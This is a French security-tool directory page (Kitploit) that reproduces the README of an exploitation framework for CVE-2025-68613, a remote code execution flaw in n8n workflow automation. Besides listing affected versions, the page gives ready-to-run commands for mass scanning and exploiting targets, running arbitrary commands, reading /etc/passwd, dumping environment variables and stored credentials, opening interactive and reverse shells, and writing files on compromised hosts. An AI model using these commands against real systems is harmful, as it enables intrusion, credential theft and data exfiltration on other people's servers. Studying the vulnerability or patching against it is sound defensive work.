Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Exécution de code à distance dans l'automatisation de workflows | Kitploit
Outils/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Scanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
Red Teaming
Outil d'Accès à Distance
Développement de Charges Utiles
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Exécution de code à distance dans l'automatisation de workflows

Voir le dépôt
5314il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

n8n God Mode Ultimate - CVE-2025-68613 Scanner & Framework d'exploitation

n8n God Mode Ultimate

Outil avancé de scan RCE et d'exploitation pour n8n Workflow Automation

Python Version License CVE CVSS Score


🎯 Aperçu

n8n God Mode Ultimate est un framework complet de tests de sécurité conçu pour détecter et valider CVE-2025-68613 sur les plateformes d'automatisation de workflows n8n. Cette vulnérabilité critique d'exécution de code à distance (RCE) affecte les versions de n8n via une injection d'expression dans les contextes d'exécution des workflows.

Détails de CVE-2025-68613

  • Score CVSS : 10.0 (Critique)
  • Vecteur d'attaque : Réseau
  • Complexité de l'attaque : Faible
  • Privilèges requis : Faibles (identifiants valides)
  • Interaction utilisateur : Aucune
  • Type de vulnérabilité : Injection d'expression → Exécution de code à distance

Versions concernées :

  • n8n >= 0.211.0 et < 1.120.4
  • n8n >= 1.121.0 et < 1.121.1

Versions corrigées :

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Fonctionnalités

🔍 Détection & Scan

  • Détection intelligente de version - Extraire la version de n8n depuis les métadonnées de la page de connexion
  • Scan par lots - Scan concurrent multi-threadé avec suivi de progression
  • Plusieurs modes de scan :
    • --detect - Détection de version uniquement (le plus rapide, non intrusif)
    • --safe - Vérification sécurisée de la vulnérabilité sans exploitation
    • --poc - Validation de preuve de concept RCE
    • --exploit - Mode exploitation complète

💣 Capacités d'exploitation

  • 4 techniques d'exploitation :
    1. Déclencheur planifié - Workflow à exécution automatique (le plus fiable)
    2. Déclencheur Webhook - Exécution déclenchée par HTTP
    3. Nœud de code - Accès direct à child_process
    4. Injection d'expression - Exécution manuelle d'expressions

🎮 Fonctionnalités God Mode

  • Shell interactif - Shell distant complet avec historique des commandes
  • Opérations sur fichiers :
    • read <fichier> - Lire des fichiers distants
    • write <fichier> <contenu> - Écrire des fichiers sur la cible
  • Extraction d'environnement - Vider toutes les variables d'environnement
  • Informations système - Détails OS, configuration réseau, infos processus
  • Reverse Shell - Génération optionnelle de payload reverse shell
  • Historique des commandes - Suivi intégré de l'historique

📊 Capacités avancées

  • Énumération des identifiants - Extraire les identifiants stockés via l'API
  • Dump de workflows - Exporter tous les workflows avec métadonnées
  • Extraction de configuration - Dump complet de la configuration système
  • Énumération des utilisateurs - Lister tous les utilisateurs n8n
  • Analyse des journaux d'exécution - Analyser les sorties de commandes des exécutions de workflows
  • Nettoyage automatique - Suppression facultative des workflows après exécution

🚀 Installation

Prérequis

# Python 3.8 ou supérieur
python3 --version

# Gestionnaire de paquets pip
pip3 --version

Installer les dépendances

# Cloner le dépôt
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Installer les paquets requis
pip3 install -r requirements.txt

Prérequis

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Utilisation

Utilisation de base

# Afficher le menu d'aide
python3 n8n-godmode-ultimate.py -h

# Détecter la version de n8n (non intrusif)
python3 n8n-godmode-ultimate.py -u http://cible:5678 --detect

# Vérification sécurisée de la vulnérabilité
python3 n8n-godmode-ultimate.py -u http://cible:5678 --safe -e [email protected] -p motdepasse

# Preuve de concept RCE
python3 n8n-godmode-ultimate.py -u http://cible:5678 --poc -e [email protected] -p motdepasse

# Exploitation complète
python3 n8n-godmode-ultimate.py -u http://cible:5678 --exploit -e [email protected] -p motdepasse

Opérations God Mode

# Exécuter une seule commande
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --cmd "whoami"

# Lire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --read-file "/etc/passwd"

# Écrire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --write-file "/tmp/test.txt" --content "payload"

# Extraire les variables d'environnement
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --dump-env

# Shell interactif
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --shell

Scan par lots

# Scanner plusieurs cibles depuis un fichier
python3 n8n-godmode-ultimate.py -l cibles.txt --detect -t 20

# Exploitation par lots
python3 n8n-godmode-ultimate.py -l cibles.txt --poc -e [email protected] -p motdepasse -t 10

Format de cibles.txt :

http://cible1:5678
https://cible2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Commandes du shell interactif

Une fois en mode shell (--shell) :

n8n> whoami              # Exécuter une commande
n8n> read /etc/passwd    # Lire un fichier
n8n> env                 # Afficher les variables d'environnement
n8n> info                # Informations système
n8n> history             # Historique des commandes
n8n> exit                # Quitter le shell

🛠️ Options de ligne de commande

Options de cible

-u, --url URL             URL cible n8n
-l, --list FILE           Fichier contenant les URL cibles
-t, --threads NUM         Nombre de threads pour le scan par lots (défaut : 10)

Authentification

-e, --email EMAIL         Email utilisateur n8n
-p, --password PASS       Mot de passe utilisateur n8n

Modes de scan

--detect                  Détection de version uniquement (le plus rapide)
--safe                    Vérification sécurisée sans exploitation
--poc                     Preuve de concept RCE
--exploit                 Mode exploitation complète

God Mode

--god                     Activer le god mode
--cmd COMMAND             Exécuter une seule commande
--read-file PATH          Lire un fichier distant
--write-file PATH         Écrire un fichier distant
--content DATA            Contenu pour l'opération d'écriture
--dump-env                Extraire toutes les variables d'environnement
--shell                   Mode shell interactif
--revshell HOST:PORT      Payload reverse shell

Options d'exploitation

--mode MODE               Mode d'exploitation : schedule|webhook|code|expression (défaut : schedule)
--timeout SEC             Délai d'attente de commande en secondes (défaut : 30)
--cleanup                 Supprimer les workflows après exécution
-k, --insecure           Désactiver la vérification SSL
-v, --verbose            Sortie détaillée
-q, --quiet              Sortie minimale

🔬 Détails techniques

Méthodologie d'exploitation

1. Déclencheur planifié (Recommandé)

Crée un workflow avec un déclencheur planifié qui s'exécute automatiquement toutes les 3 secondes. Méthode la plus fiable.

Télécharger l’outil